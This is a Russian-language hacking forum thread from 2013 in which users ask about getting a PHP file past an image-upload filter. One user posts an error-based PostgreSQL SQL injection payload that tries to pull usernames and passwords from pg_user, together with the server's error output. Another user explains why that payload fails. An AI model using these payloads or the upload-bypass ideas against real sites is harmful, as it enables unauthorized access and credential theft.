HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2288 из 2438 « Первая < 12881788218822382278 2284 2285 2286 2287 2288 2289 2290 2291 2292 229823382388 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #22871  
Старый 13.10.2013, 15:15
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию
Цитата:
Сообщение от wanttoask  
wanttoask said:
За совет спасибо, но я ведь не смогу на чужом сервере htaccess менять
Да, скорее всего не сможешь. Но тут ничего не поделать, если бы в 2013 году во всех .png картинках исполнялся код наш мир не был бы таким каким мы его знаем.
 
Ответить с цитированием

  #22872  
Старый 13.10.2013, 15:18
wanttoask
Guest
Сообщений: n/a
Провел на форуме:
29758

Репутация: 0
По умолчанию
Можно заставить файл аплоад думать, что я загружаю пнг/джпг и загружать пхп?
 
Ответить с цитированием

  #22873  
Старый 13.10.2013, 15:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
16399

Репутация: 10
По умолчанию
Всё зависит от настроек сервера и кода скрипта.

Можешь например тут почитать: https://rdot.org/forum/showpost.php?p=1142&postcount=5

P.S. По мотивам оригинального вопроса вспомнился этот пост: /showpost.php?p=1473083&postcount=13

Пожалуйста
 
Ответить с цитированием

  #22874  
Старый 13.10.2013, 15:26
wanttoask
Guest
Сообщений: n/a
Провел на форуме:
29758

Репутация: 0
По умолчанию
Спасибо
 
Ответить с цитированием

  #22875  
Старый 13.10.2013, 15:40
wanttoask
Guest
Сообщений: n/a
Провел на форуме:
29758

Репутация: 0
По умолчанию
Можно ли *.php.jpeg как-нибудь переименовать, чтобы отсечь .jpeg?
 
Ответить с цитированием

  #22876  
Старый 13.10.2013, 17:45
Unknown
Guest
Сообщений: n/a
Провел на форуме:
8396

Репутация: 6
По умолчанию
Цитата:
Сообщение от wanttoask  
wanttoask said:
Можно ли *.php.jpeg как-нибудь переименовать, чтобы отсечь .jpeg?
Переименовать в *.php - отсекает jpeg с гарантией.

Каков вопрос - таков и ответ.
 
Ответить с цитированием

  #22877  
Старый 16.10.2013, 02:26
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию
Два раза подряд нахожу SQL inj в PostgreSQL

И никак не пойму почему при таком запросе:

'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_user+LIMIT+1+OFFSET+1)+as+int)--

выдает:

Warning: ERROR: invalid input syntax for integer: "xxx3:********" query: select src from url_alias where dst='firms' and 1=cast((SELECT usename||chr(58)||passwd FROM pg_user LIMIT 1 OFFSET 1) as int)--' in /web/XXX/www/includes/database.pgsql.inc on line 160

пароль под звездочками...!

Что не так?

П.с.g_shadow - доступа нет.

брал аналогию запроса:

'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_shadow+LIMIT+1+OFFSET+1)+as+int)--

Query failed: ERROR: invalid input syntax for integer: "pg_database" in /web/XXX/www/includes/database.pgsql.inc on line 139
 
Ответить с цитированием

  #22878  
Старый 16.10.2013, 03:13
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от Always  
Always said:
Два раза подряд нахожу SQL inj в PostgreSQL
И никак не пойму почему при таком запросе:
'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_user+LIMIT+1+OFFSET+1)+as+int)--
выдает:
Warning: ERROR: invalid input syntax for integer: "xxx3:********" query: select src from url_alias where dst='firms' and 1=cast((SELECT usename||chr(58)||passwd FROM pg_user LIMIT 1 OFFSET 1) as int)--' in /web/XXX/www/includes/database.pgsql.inc on line 160
пароль под звездочками...!
Что не так?
П.с.
g_shadow - доступа нет.
брал аналогию запроса:
'+and+1=cast((SELECT+usename||chr(58)||passwd+FROM +pg_shadow+LIMIT+1+OFFSET+1)+as+int)--
Query failed: ERROR: invalid input syntax for integer: "pg_database" in /web/XXX/www/includes/database.pgsql.inc on line 139
Потому что в pg_user не хранится пасс(http://www.postgresql.org/docs/8.3/static/view-pg-user.html), ну а на pg_shadow нужны рутовые права(к слову).
 
Ответить с цитированием

  #22879  
Старый 17.10.2013, 04:04
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию
Цитата:
Сообщение от Melfis  
Melfis said:
Потому что в pg_user не хранится пасс(http://www.postgresql.org/docs/8.3/static/view-pg-user.html), ну а на pg_shadow нужны рутовые права(к слову).
Тогда получается, что получить данные практически невозможно?
 
Ответить с цитированием

  #22880  
Старый 17.10.2013, 14:50
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от Always  
Always said:
Тогда получается, что получить данные практически невозможно?
Какие данные?
 
Ответить с цитированием
Ответ
Страница 2288 из 2438 « Первая < 12881788218822382278 2284 2285 2286 2287 2288 2289 2290 2291 2292 229823382388 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ